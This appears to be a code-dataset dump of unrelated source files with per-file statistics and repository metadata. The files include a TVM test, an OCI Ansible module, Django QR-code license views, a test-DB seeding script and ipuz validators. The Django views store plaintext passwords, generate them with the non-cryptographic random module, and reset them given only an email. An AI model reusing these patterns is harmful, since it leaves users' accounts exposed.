B = ib.allocate("float32", m, name="B", scope="shared")
with ib.new_scope():
ib.scope_attr(B.asobject(), "double_buffer_scope", 1)
with ib.for_range(0, m) as j:
B[j] = A[i * 4 + j]
with ib.for_range(0, m) as j:
C[j] = B[j] + 1
stmt = ib.get()
stmt = tvm.tir.ir_pass.InjectDoubleBuffer(stmt, 2)
stmt = tvm.tir.ir_pass.Simplify(stmt)
assert isinstance(stmt.body.body, tvm.tir.Allocate)
assert stmt.body.body.extents[0].value == 2
mod = tvm.IRModule({
"db" : tvm.tir.PrimFunc([A.asobject(), C.asobject()], stmt)
})
f = tvm.tir.transform.ThreadSync("shared")(mod)["db"]
count = [0]
def count_sync(op):
if isinstance(op, tvm.tir.Call) and op.name == "tvm_storage_sync":
count[0] += 1
tvm.tir.ir_pass.PostOrderVisit(f.body, count_sync)
assert count[0] == 4
if __name__ == "__main__":
test_double_buffer()
| 36.385965 | 74 | 0.655738 | 318 | 2,074 | 4.18239 | 0.430818 | 0.03609 | 0.02406 | 0.031579 | 0.065414 | 0.041353 | 0.028571 | 0.028571 | 0 | 0 | 0 | 0.019171 | 0.220347 | 2,074 | 56 | 75 | 37.035714 | 0.80334 | 0.362584 | 0 | 0.055556 | 0 | 0 | 0.085824 | 0 | 0 | 0 | 0 | 0 | 0.083333 | 1 | 0.055556 | false | 0.083333 | 0.055556 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 |
0
| 1 |
6b0a2521796cb92f0d1e011306fd05dc969275cf
| 355 |
py
|
Python
|
origamibot/core/teletypes/poll_option.py
|
cmd410/OrigamiBot
|
03667d069f0c0b088671936ce36bf8f85a029b93
|
[
"MIT"
] | 4 |
2020-06-30T10:32:54.000Z
|
2020-11-01T23:07:58.000Z
|
origamibot/core/teletypes/poll_option.py
|
cmd410/OrigamiBot
|
03667d069f0c0b088671936ce36bf8f85a029b93
|
[
"MIT"
] | 6 |
2020-06-26T23:14:59.000Z
|
2020-07-26T11:48:07.000Z
|
origamibot/core/teletypes/poll_option.py
|
cmd410/OrigamiBot
|
03667d069f0c0b088671936ce36bf8f85a029b93
|
[
"MIT"
] | 1 |
2020-07-28T08:52:51.000Z
|
2020-07-28T08:52:51.000Z
|
from .base import TelegramStructure, Field
class PollOption(TelegramStructure):
text = Field()
voter_count = Field()
def __init__(self,
text: str,
voter_count: int
):
self.text = \
Field(text, [str])
self.voter_count = \
Field(voter_count, [int])
| 19.722222 | 42 | 0.515493 | 33 | 355 | 5.30303 | 0.454545 | 0.228571 | 0.171429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.388732 | 355 | 17 | 43 | 20.882353 | 0.806452 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.083333 | 0 | 0.416667 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
6b0f57abb4c6963ae8d955c1ecf87495f2b1c219
| 12,193 |
py
|
Python
|
plugins/modules/oci_blockstorage_volume_backup_policy_facts.py
|
LaudateCorpus1/oci-ansible-collection
|
2b1cd87b4d652a97c1ca752cfc4fdc4bdb37a7e7
|
[
"Apache-2.0"
] | null | null | null |
plugins/modules/oci_blockstorage_volume_backup_policy_facts.py
|
LaudateCorpus1/oci-ansible-collection
|
2b1cd87b4d652a97c1ca752cfc4fdc4bdb37a7e7
|
[
"Apache-2.0"
] | null | null | null |
plugins/modules/oci_blockstorage_volume_backup_policy_facts.py
|
LaudateCorpus1/oci-ansible-collection
|
2b1cd87b4d652a97c1ca752cfc4fdc4bdb37a7e7
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
# Copyright (c) 2020, 2022 Oracle and/or its affiliates.
# This software is made available to you under the terms of the GPL 3.0 license or the Apache 2.0 license.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Apache License v2.0
# See LICENSE.TXT for details.
# GENERATED FILE - DO NOT EDIT - MANUAL CHANGES WILL BE OVERWRITTEN
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
"metadata_version": "1.1",
"status": ["preview"],
"supported_by": "community",
}
DOCUMENTATION = """
---
module: oci_blockstorage_volume_backup_policy_facts
short_description: Fetches details about one or multiple VolumeBackupPolicy resources in Oracle Cloud Infrastructure
description:
- Fetches details about one or multiple VolumeBackupPolicy resources in Oracle Cloud Infrastructure
- Lists all the volume backup policies available in the specified compartment.
- For more information about Oracle defined backup policies and user defined backup policies,
see L(Policy-Based Backups,https://docs.cloud.oracle.com/iaas/Content/Block/Tasks/schedulingvolumebackups.htm).
- If I(policy_id) is specified, the details of a single VolumeBackupPolicy will be returned.
version_added: "2.9.0"
author: Oracle (@oracle)
options:
policy_id:
description:
- The OCID of the volume backup policy.
- Required to get a specific volume_backup_policy.
type: str
aliases: ["id"]
compartment_id:
description:
- The OCID of the compartment.
If no compartment is specified, the Oracle defined backup policies are listed.
type: str
extends_documentation_fragment: [ oracle.oci.oracle, oracle.oci.oracle_display_name_option ]
"""
EXAMPLES = """
- name: Get a specific volume_backup_policy
oci_blockstorage_volume_backup_policy_facts:
# required
policy_id: "ocid1.policy.oc1..xxxxxxEXAMPLExxxxxx"
- name: List volume_backup_policies
oci_blockstorage_volume_backup_policy_facts:
# optional
compartment_id: "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx"
"""
RETURN = """
volume_backup_policies:
description:
- List of VolumeBackupPolicy resources
returned: on success
type: complex
contains:
display_name:
description:
- A user-friendly name. Does not have to be unique, and it's changeable.
Avoid entering confidential information.
returned: on success
type: str
sample: display_name_example
id:
description:
- The OCID of the volume backup policy.
returned: on success
type: str
sample: "ocid1.resource.oc1..xxxxxxEXAMPLExxxxxx"
schedules:
description:
- The collection of schedules that this policy will apply.
returned: on success
type: complex
contains:
backup_type:
description:
- The type of volume backup to create.
returned: on success
type: str
sample: FULL
offset_seconds:
description:
- The number of seconds that the volume backup start
time should be shifted from the default interval boundaries specified by
the period. The volume backup start time is the frequency start time plus the offset.
returned: on success
type: int
sample: 56
period:
description:
- The volume backup frequency.
returned: on success
type: str
sample: ONE_HOUR
offset_type:
description:
- Indicates how the offset is defined. If value is `STRUCTURED`,
then `hourOfDay`, `dayOfWeek`, `dayOfMonth`, and `month` fields are used
and `offsetSeconds` will be ignored in requests and users should ignore its
value from the responses.
- "`hourOfDay` is applicable for periods `ONE_DAY`,
`ONE_WEEK`, `ONE_MONTH` and `ONE_YEAR`."
- "`dayOfWeek` is applicable for period
`ONE_WEEK`."
- "`dayOfMonth` is applicable for periods `ONE_MONTH` and `ONE_YEAR`."
- "'month' is applicable for period 'ONE_YEAR'."
- They will be ignored in the requests for inapplicable periods.
- If value is `NUMERIC_SECONDS`, then `offsetSeconds`
will be used for both requests and responses and the structured fields will be
ignored in the requests and users should ignore their values from the responses.
- For clients using older versions of Apis and not sending `offsetType` in their
requests, the behaviour is just like `NUMERIC_SECONDS`.
returned: on success
type: str
sample: STRUCTURED
hour_of_day:
description:
- The hour of the day to schedule the volume backup.
returned: on success
type: int
sample: 56
day_of_week:
description:
- The day of the week to schedule the volume backup.
returned: on success
type: str
sample: MONDAY
day_of_month:
description:
- The day of the month to schedule the volume backup.
returned: on success
type: int
sample: 56
month:
description:
- The month of the year to schedule the volume backup.
returned: on success
type: str
sample: JANUARY
retention_seconds:
description:
- How long, in seconds, to keep the volume backups created by this schedule.
returned: on success
type: int
sample: 56
time_zone:
description:
- Specifies what time zone is the schedule in
returned: on success
type: str
sample: UTC
destination_region:
description:
- The paired destination region for copying scheduled backups to. Example `us-ashburn-1`.
See L(Region Pairs,https://docs.cloud.oracle.com/iaas/Content/Block/Tasks/schedulingvolumebackups.htm#RegionPairs) for details about paired
regions.
returned: on success
type: str
sample: us-phoenix-1
time_created:
description:
- The date and time the volume backup policy was created. Format defined by L(RFC3339,https://tools.ietf.org/html/rfc3339).
returned: on success
type: str
sample: "2013-10-20T19:20:30+01:00"
compartment_id:
description:
- The OCID of the compartment that contains the volume backup.
returned: on success
type: str
sample: "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx"
defined_tags:
description:
- Defined tags for this resource. Each key is predefined and scoped to a
namespace. For more information, see L(Resource Tags,https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm).
- "Example: `{\\"Operations\\": {\\"CostCenter\\": \\"42\\"}}`"
returned: on success
type: dict
sample: {'Operations': {'CostCenter': 'US'}}
freeform_tags:
description:
- Free-form tags for this resource. Each tag is a simple key-value pair with no
predefined name, type, or namespace. For more information, see L(Resource
Tags,https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm).
- "Example: `{\\"Department\\": \\"Finance\\"}`"
returned: on success
type: dict
sample: {'Department': 'Finance'}
sample: [{
"display_name": "display_name_example",
"id": "ocid1.resource.oc1..xxxxxxEXAMPLExxxxxx",
"schedules": [{
"backup_type": "FULL",
"offset_seconds": 56,
"period": "ONE_HOUR",
"offset_type": "STRUCTURED",
"hour_of_day": 56,
"day_of_week": "MONDAY",
"day_of_month": 56,
"month": "JANUARY",
"retention_seconds": 56,
"time_zone": "UTC"
}],
"destination_region": "us-phoenix-1",
"time_created": "2013-10-20T19:20:30+01:00",
"compartment_id": "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx",
"defined_tags": {'Operations': {'CostCenter': 'US'}},
"freeform_tags": {'Department': 'Finance'}
}]
"""
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.oracle.oci.plugins.module_utils import oci_common_utils
from ansible_collections.oracle.oci.plugins.module_utils.oci_resource_utils import (
OCIResourceFactsHelperBase,
get_custom_class,
)
try:
from oci.core import BlockstorageClient
HAS_OCI_PY_SDK = True
except ImportError:
HAS_OCI_PY_SDK = False
class VolumeBackupPolicyFactsHelperGen(OCIResourceFactsHelperBase):
"""Supported operations: get, list"""
def get_required_params_for_get(self):
return [
"policy_id",
]
def get_required_params_for_list(self):
return []
def get_resource(self):
return oci_common_utils.call_with_backoff(
self.client.get_volume_backup_policy,
policy_id=self.module.params.get("policy_id"),
)
def list_resources(self):
optional_list_method_params = [
"compartment_id",
"display_name",
]
optional_kwargs = dict(
(param, self.module.params[param])
for param in optional_list_method_params
if self.module.params.get(param) is not None
)
return oci_common_utils.list_all_resources(
self.client.list_volume_backup_policies, **optional_kwargs
)
VolumeBackupPolicyFactsHelperCustom = get_custom_class(
"VolumeBackupPolicyFactsHelperCustom"
)
class ResourceFactsHelper(
VolumeBackupPolicyFactsHelperCustom, VolumeBackupPolicyFactsHelperGen
):
pass
def main():
module_args = oci_common_utils.get_common_arg_spec()
module_args.update(
dict(
policy_id=dict(aliases=["id"], type="str"),
compartment_id=dict(type="str"),
display_name=dict(type="str"),
)
)
module = AnsibleModule(argument_spec=module_args)
if not HAS_OCI_PY_SDK:
module.fail_json(msg="oci python sdk required for this module.")
resource_facts_helper = ResourceFactsHelper(
module=module,
resource_type="volume_backup_policy",
service_client_class=BlockstorageClient,
namespace="core",
)
result = []
if resource_facts_helper.is_get():
result = [resource_facts_helper.get()]
elif resource_facts_helper.is_list():
result = resource_facts_helper.list()
else:
resource_facts_helper.fail()
module.exit_json(volume_backup_policies=result)
if __name__ == "__main__":
main()
| 38.342767 | 157 | 0.584598 | 1,269 | 12,193 | 5.459417 | 0.253743 | 0.04157 | 0.046622 | 0.057592 | 0.365762 | 0.285508 | 0.182448 | 0.167436 | 0.141599 | 0.113453 | 0 | 0.012455 | 0.341507 | 12,193 | 317 | 158 | 38.463722 | 0.850417 | 0.033954 | 0 | 0.278986 | 0 | 0.018116 | 0.784652 | 0.055579 | 0 | 0 | 0 | 0 | 0 | 1 | 0.018116 | false | 0.003623 | 0.021739 | 0.01087 | 0.061594 | 0.003623 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
6b1abd24dcce5c1b223e996046c73de1b7c697fc
| 1,332 |
py
|
Python
|
Concurrent/PipelineDecomposingTask.py
|
rafagarciac/ParallelProgrammingPython
|
bba91984018688f41049fd63961d3b8872876336
|
[
"MIT"
] | null | null | null |
Concurrent/PipelineDecomposingTask.py
|
rafagarciac/ParallelProgrammingPython
|
bba91984018688f41049fd63961d3b8872876336
|
[
"MIT"
] | null | null | null |
Concurrent/PipelineDecomposingTask.py
|
rafagarciac/ParallelProgrammingPython
|
bba91984018688f41049fd63961d3b8872876336
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
"""
Artesanal example Pipe without Pipe class.
"""
__author__ = "Rafael García Cuéllar"
__email__ = "r.gc@hotmail.es"
__copyright__ = "Copyright (c) 2018 Rafael García Cuéllar"
__license__ = "MIT"
from concurrent.futures import ProcessPoolExecutor
import time
import random
def worker(arg):
time.sleep(random.random())
return arg
def pipeline(future):
pools[1].submit(worker, future.result()).add_done_callback(printer)
def printer(future):
pools[2].submit(worker, future.result()).add_done_callback(spout)
def spout(future):
print(future.result())
def instanceProcessPool():
pools = []
for i in range(3):
pool = ProcessPoolExecutor(2)
pools.append(pool)
return pools
def shutdownPools(pools):
for pool in pools:
pool.shutdown()
def runThreadsInPipeline(pools):
for pool in pools:
pool.submit(worker, random.random()).add_done_callback(pipeline)
if __name__ == "__main__":
__spec__ = None # Fix multiprocessing in Spyder's IPython
pools = instanceProcessPool() # pool = ProcessPoolExecutor([max_workers])
runThreadsInPipeline(pools) # pools[0].submit(worker, random.random()).add_done_callback(pipeline)
shutdownPools(pools) # pool.shutdown()
| 27.183673 | 107 | 0.678679 | 152 | 1,332 | 5.703947 | 0.473684 | 0.055363 | 0.069204 | 0.055363 | 0.251442 | 0.251442 | 0.198385 | 0.10842 | 0 | 0 | 0 | 0.008531 | 0.207958 | 1,332 | 49 | 108 | 27.183673 | 0.81327 | 0.173423 | 0 | 0.060606 | 0 | 0 | 0.080111 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.212121 | false | 0 | 0.090909 | 0 | 0.363636 | 0.090909 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
6b2889ee02cbc2db0ebf9270a48b091ad3ca3b59
| 8,237 |
py
|
Python
|
core/views.py
|
Neelamegam2000/QRcode-for-license
|
a6d4c9655c5ba52b24c1ea737797557f06e0fcbf
|
[
"MIT"
] | null | null | null |
core/views.py
|
Neelamegam2000/QRcode-for-license
|
a6d4c9655c5ba52b24c1ea737797557f06e0fcbf
|
[
"MIT"
] | null | null | null |
core/views.py
|
Neelamegam2000/QRcode-for-license
|
a6d4c9655c5ba52b24c1ea737797557f06e0fcbf
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render, redirect
from django.conf import settings
from django.core.files.storage import FileSystemStorage,default_storage
from django.core.mail import send_mail, EmailMessage
from core.models import Document
from core.forms import DocumentForm
from django.contrib import messages
import os
import pyqrcode
import png
import random
import base64
import cv2
import numpy as np
import pyzbar.pyzbar as pyzbar
def home(request):
documents= Document.objects.all()
return render(request, 'home.html', { 'documents': documents })
"""def simple_upload(request):
if request.method == 'POST' and request.FILES['myfile']:
myfile = request.FILES['myfile']
fs = FileSystemStorage()
filename = fs.save(myfile.name, myfile)
uploaded_file_url = fs.url(filename)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
media_path = os.path.join(BASE_DIR,'media')
full_path=os.path.join(media_path,myfile.name)
qr=pyqrcode.create(uploaded_file_url)
filename_before=filename.rsplit(".")
filename1=filename_before[0]+".png"
s=qr.png(filename1,scale=6)
'''from fpdf import FPDF
pdf=FPDF()
pdf.add_page()
pdf.image(filename1,x=50,y=None,w=60,h=60,type="",link=uploaded_file_url)'''
return render(request, 'simple_upload.html', {
'uploaded_file_url': uploaded_file_url
})
return render(request, 'simple_upload.html')"""
def model_form_upload(request):
id=""
msg=""
if request.method == 'POST':
form = DocumentForm(request.POST, request.FILES,request.POST)
if form.is_valid():
form.save()
email=form.cleaned_data['Email']
document_count=Document.objects.values_list('document').count()
document_last=Document.objects.values_list('document')[document_count-1]
document_name=document_last[0]
print(email)
t=Document.objects.last()
num_list=['0','1','2','3','4','5','6','7','8','9']
password1=""
for i in range(0,8):
password1=password1+random.choice(num_list)
t.password=password1
print(type(document_name))
document_name1=document_name.encode('ascii')
document_encode=str(base64.b64encode(document_name1))
ax=document_encode[2:-1]
t.file_url=ax
print(ax)
t.save()
qr=pyqrcode.create(ax)
filename=document_name.rsplit(".")
filename1=filename[0].split("/")
filename2=filename1[1]+".png"
qr.png(filename2,scale=6)
"""mail=EmailMessage('QR',password1,'vmneelamegam2000@gmail.com',[email])
#mail.attach(filename2,filename2.content_type)
mail.send()"""
subject = 'QRcode scanner for license'
message = password1
email_from = settings.EMAIL_HOST_USER
recipient_list = [email, ]
mail=EmailMessage( subject, message, email_from, recipient_list )
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
mail.attach_file(os.path.join(BASE_DIR,filename2))
mail.send()
msg="your successfully uploaded"
return redirect('model_form_upload')
else:
form = DocumentForm()
return render(request, 'model_form_upload.html', {'form': form,'msg':msg})
def mypass(request):
m=""
if(request.POST.get("pswd")==request.POST.get("pswd3")):
user_data=Document.objects.filter(Email=request.POST.get("email"),password=request.POST.get("old_pswd")).update(password=request.POST.get("pswd"))
user_data1=Document.objects.filter(Email=request.POST.get("email"),password=request.POST.get("pswd"))
"""if(len_user_data==1):
userdata.password=request.POST.get("pswd")
return render(request,'mypass.html',{u:"you have change the password successfully"})
else:"""
c=0
if(user_data1):
subject = 'QRcode scanner for license'
message = "Password has succesfully changed"+" "+request.POST.get("pswd")
email_from = settings.EMAIL_HOST_USER
recipient_list = [request.POST.get("email"), ]
mail=EmailMessage( subject, message, email_from, recipient_list )
mail.send()
c=1
m="your password is changed succesfully"
elif(len(Document.objects.filter(Email=request.POST.get("email"),password=request.POST.get("old_pswd")))==0 and request.method=="POST"):
m="your email or password is incorrect"
else:
m=""
print(m)
return render(request,'mypass.html',{"m":m})
def user_req(request):
if("scanner" in request.POST and request.method=="POST"):
cap = cv2.VideoCapture(0+cv2.CAP_DSHOW)
font = cv2.FONT_HERSHEY_PLAIN
decodedObjects=[]
while decodedObjects==[]:
_, frame = cap.read()
decodedObjects = pyzbar.decode(frame)
for obj in decodedObjects:
points = obj.polygon
(x,y,w,h) = obj.rect
pts = np.array(points, np.int32)
pts = pts.reshape((-1, 1, 2))
cv2.polylines(frame, [pts], True, (0, 255, 0), 3)
cv2.putText(frame, str(obj.data), (50, 50), font, 2,
(255, 0, 0), 3)
id =obj.data.decode("utf-8")
cv2.imshow("QR Reader", frame)
key = cv2.waitKey(10) & 0xFF
if decodedObjects!=[] :
cv2.destroyAllWindows()
return render(request,"user_req.html",{"id":id})
if('proceed' in request.POST and request.method=="POST"):
userdata=Document.objects.filter(file_url=request.POST.get("id1")).filter(password=request.POST.get("password1"))
return render(request,"user_req.html",{"userdata":userdata})
return render(request,"user_req.html",)
def user(request):
return render(request,"user.html",)
def forget_pass(request):
msg=""
if(request.method=="POST"):
num_list=['0','1','2','3','4','5','6','7','8','9']
password1=""
for i in range(0,8):
password1=password1+random.choice(num_list)
user_data=Document.objects.filter(Email=request.POST.get("email")).update(password=password1)
subject = 'QRcode scanner for license Forget password'
message = "Password has succesfully changed"+" "+password1
email_from = settings.EMAIL_HOST_USER
recipient_list = [request.POST.get("email"), ]
mail=EmailMessage( subject, message, email_from, recipient_list )
mail.send()
if(user_data>0):
msg="your password is changed succesfully and mail sent"
elif(user_data==0):
msg="your email is incorrect or not found"
return render(request,"forget_pass.html",{"msg":msg})
def qrcode_miss(request):
msg=""
if(request.method=='POST' and Document.objects.filter(Email=request.POST.get('email'),password=request.POST.get('password1'))):
user_data=Document.objects.values_list('document').filter(Email=request.POST.get('email'),password=request.POST.get('password1'))
m=user_data[0][0]
p=m.split('/')
print(p)
t=p[1]
print(t)
subject = 'QRcode scanner for license'
message = "resend"
email_from = settings.EMAIL_HOST_USER
recipient_list = [request.POST.get('email'),]
mail=EmailMessage( subject, message, email_from, recipient_list )
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
k=os.path.join(BASE_DIR,t)
print(k)
mail.attach_file(k)
mail.send()
msg="your qrcode is sent to your email"
elif(request.method=='POST'and Document.objects.values_list('document').filter(Email=request.POST.get('email'),password=request.POST.get('password1')).count()==0):
msg="your email or password is incorrect"
return render(request,'qrcode_miss.html',{"msg":msg})
| 42.901042 | 167 | 0.617701 | 1,016 | 8,237 | 4.889764 | 0.20374 | 0.059783 | 0.064815 | 0.038245 | 0.466787 | 0.367552 | 0.298712 | 0.285427 | 0.285427 | 0.253019 | 0 | 0.020186 | 0.2422 | 8,237 | 191 | 168 | 43.125654 | 0.775713 | 0 | 0 | 0.223684 | 0 | 0 | 0.124964 | 0.003171 | 0.013158 | 0 | 0.000577 | 0 | 0 | 1 | 0.046053 | false | 0.164474 | 0.098684 | 0.006579 | 0.210526 | 0.046053 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 |
0
| 1 |
6b2cec5a2588f39302333a5f4dacaf75c507b16b
| 3,344 |
py
|
Python
|
backend/api/management/commands/create_testdb.py
|
INSRapperswil/nornir-web
|
458e6b24bc373197044b4b7b5da74f16f93a9459
|
[
"MIT"
] | 2 |
2021-06-01T08:33:04.000Z
|
2021-08-20T04:22:39.000Z
|
backend/api/management/commands/create_testdb.py
|
INSRapperswil/nornir-web
|
458e6b24bc373197044b4b7b5da74f16f93a9459
|
[
"MIT"
] | null | null | null |
backend/api/management/commands/create_testdb.py
|
INSRapperswil/nornir-web
|
458e6b24bc373197044b4b7b5da74f16f93a9459
|
[
"MIT"
] | null | null | null |
"""
Setup DB with example data for tests
"""
from django.contrib.auth.hashers import make_password
from django.contrib.auth.models import User, Group
from django.core.management.base import BaseCommand
from api import models
class Command(BaseCommand):
help = 'Setup DB with example data for tests'
def handle(self, *args, **options):
print('---- Creating Users ----')
User.objects.get_or_create(username='thomastest', password=make_password('imatestin'))
thomas = User.objects.get(username='thomastest')
User.objects.get_or_create(username='norbert', password=make_password('netzwerk'))
norbert = User.objects.get(username='norbert')
User.objects.get_or_create(username='stefan', password=make_password('helldesk'))
stefan = User.objects.get(username='stefan')
superuser = Group.objects.get(name='superuser')
superuser.user_set.add(thomas)
netadmin = Group.objects.get(name='netadmin')
netadmin.user_set.add(norbert)
support = Group.objects.get(name='support')
support.user_set.add(stefan)
print('---- Creating Inventory ----')
models.Inventory.objects.create(name='Example', hosts_file='web_nornir/nornir_config/example_config/hosts.yaml',
groups_file='web_nornir/nornir_config/example_config/groups.yaml', type=1)
models.Inventory.objects.create(name='INS Lab', hosts_file='web_nornir/nornir_config/inslab_config/hosts.yaml',
groups_file='web_nornir/nornir_config/inslab_config/groups.yaml', type=1)
print('---- Creating Job Templates ----')
models.JobTemplate.objects.create(name='hello_world', description='This prints a hello world',
file_name='hello_world.py', created_by_id=1)
models.JobTemplate.objects.create(name='Get CDP Neighbors', description='Lists all CDP neighbors',
file_name='get_cdp_neighbors.py', created_by_id=1)
models.JobTemplate.objects.create(name='Get Interfaces',
description='Gets brief information about all interfaces, sh ip int br',
file_name='get_interfaces.py', created_by_id=1)
models.JobTemplate.objects.create(name='Ping Device',
description='Pings a chosen network device and reports if reachable',
file_name='ping.py', variables=['target'], created_by_id=1)
models.JobTemplate.objects.create(name='Get Configuration', description='Gets all configuration from device',
file_name='get_configuration.py', created_by_id=1)
print('---- Creating Tasks ----')
models.Task.objects.create(name='Get Hello World', created_by_id=1, template_id=1, inventory_id=1)
models.Task.objects.create(name='Get CDP neighbors of INS lab', created_by_id=2, template_id=2, inventory_id=2)
models.Task.objects.create(name='Get interfaces of INS lab', created_by_id=2, template_id=3, inventory_id=2)
print('---- ALL DONE!! ----')
| 54.819672 | 121 | 0.62201 | 387 | 3,344 | 5.21447 | 0.284238 | 0.06442 | 0.084242 | 0.035679 | 0.433598 | 0.35332 | 0.247275 | 0.173935 | 0.173935 | 0.098612 | 0 | 0.006486 | 0.262261 | 3,344 | 60 | 122 | 55.733333 | 0.811512 | 0.010766 | 0 | 0 | 0 | 0 | 0.283333 | 0.061728 | 0 | 0 | 0 | 0 | 0 | 1 | 0.023256 | false | 0.093023 | 0.093023 | 0 | 0.162791 | 0.139535 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 |
0
| 1 |
6b2e543e1da4f0dd04f05a16bdaaac83f262d6ce
| 1,505 |
py
|
Python
|
ipuz/puzzlekinds/__init__.py
|
maiamcc/ipuz
|
fbe6f663b28ad42754622bf2d3bbe59a26be2615
|
[
"MIT"
] | 5 |
2015-06-23T17:18:41.000Z
|
2020-05-05T16:43:14.000Z
|
ipuz/puzzlekinds/__init__.py
|
maiamcc/ipuz
|
fbe6f663b28ad42754622bf2d3bbe59a26be2615
|
[
"MIT"
] | 3 |
2015-08-21T05:17:22.000Z
|
2021-03-20T18:39:31.000Z
|
ipuz/puzzlekinds/__init__.py
|
maiamcc/ipuz
|
fbe6f663b28ad42754622bf2d3bbe59a26be2615
|
[
"MIT"
] | 3 |
2018-01-15T17:28:10.000Z
|
2020-09-29T20:32:21.000Z
|
from .acrostic import IPUZ_ACROSTIC_VALIDATORS
from .answer import IPUZ_ANSWER_VALIDATORS
from .block import IPUZ_BLOCK_VALIDATORS
from .crossword import IPUZ_CROSSWORD_VALIDATORS
from .fill import IPUZ_FILL_VALIDATORS
from .sudoku import IPUZ_SUDOKU_VALIDATORS
from .wordsearch import IPUZ_WORDSEARCH_VALIDATORS
IPUZ_PUZZLEKINDS = {
"http://ipuz.org/acrostic": {
"mandatory": (
"puzzle",
),
"validators": {
1: IPUZ_ACROSTIC_VALIDATORS,
},
},
"http://ipuz.org/answer": {
"mandatory": (),
"validators": {
1: IPUZ_ANSWER_VALIDATORS,
},
},
"http://ipuz.org/block": {
"mandatory": (
"dimensions",
),
"validators": {
1: IPUZ_BLOCK_VALIDATORS,
},
},
"http://ipuz.org/crossword": {
"mandatory": (
"dimensions",
"puzzle",
),
"validators": {
1: IPUZ_CROSSWORD_VALIDATORS,
},
},
"http://ipuz.org/fill": {
"mandatory": (),
"validators": {
1: IPUZ_FILL_VALIDATORS,
},
},
"http://ipuz.org/sudoku": {
"mandatory": (
"puzzle",
),
"validators": {
1: IPUZ_SUDOKU_VALIDATORS,
},
},
"http://ipuz.org/wordsearch": {
"mandatory": (
"dimensions",
),
"validators": {
1: IPUZ_WORDSEARCH_VALIDATORS,
},
},
}
| 23.153846 | 50 | 0.509635 | 120 | 1,505 | 6.15 | 0.15 | 0.094851 | 0.104336 | 0.170732 | 0.173442 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007216 | 0.355482 | 1,505 | 64 | 51 | 23.515625 | 0.753608 | 0 | 0 | 0.403226 | 0 | 0 | 0.226578 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.112903 | 0 | 0.112903 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
6b385bed93debf4cc525192d73536e80c2566746
| 591 |
py
|
Python
|
python/ray/train/__init__.py
|
jamesliu/ray
|
11ab412db1fa3603a3006e8ed414e80dd1f11c0c
|
[
"Apache-2.0"
] | 33 |
2020-05-27T14:25:24.000Z
|
2022-03-22T06:11:30.000Z
|
python/ray/train/__init__.py
|
jamesliu/ray
|
11ab412db1fa3603a3006e8ed414e80dd1f11c0c
|
[
"Apache-2.0"
] | 227 |
2021-10-01T08:00:01.000Z
|
2021-12-28T16:47:26.000Z
|
python/ray/train/__init__.py
|
gramhagen/ray
|
c18caa4db36d466718bdbcb2229aa0b2dc03da1f
|
[
"Apache-2.0"
] | 5 |
2020-08-06T15:53:07.000Z
|
2022-02-09T03:31:31.000Z
|
from ray.train.backend import BackendConfig
from ray.train.callbacks import TrainingCallback
from ray.train.checkpoint import CheckpointStrategy
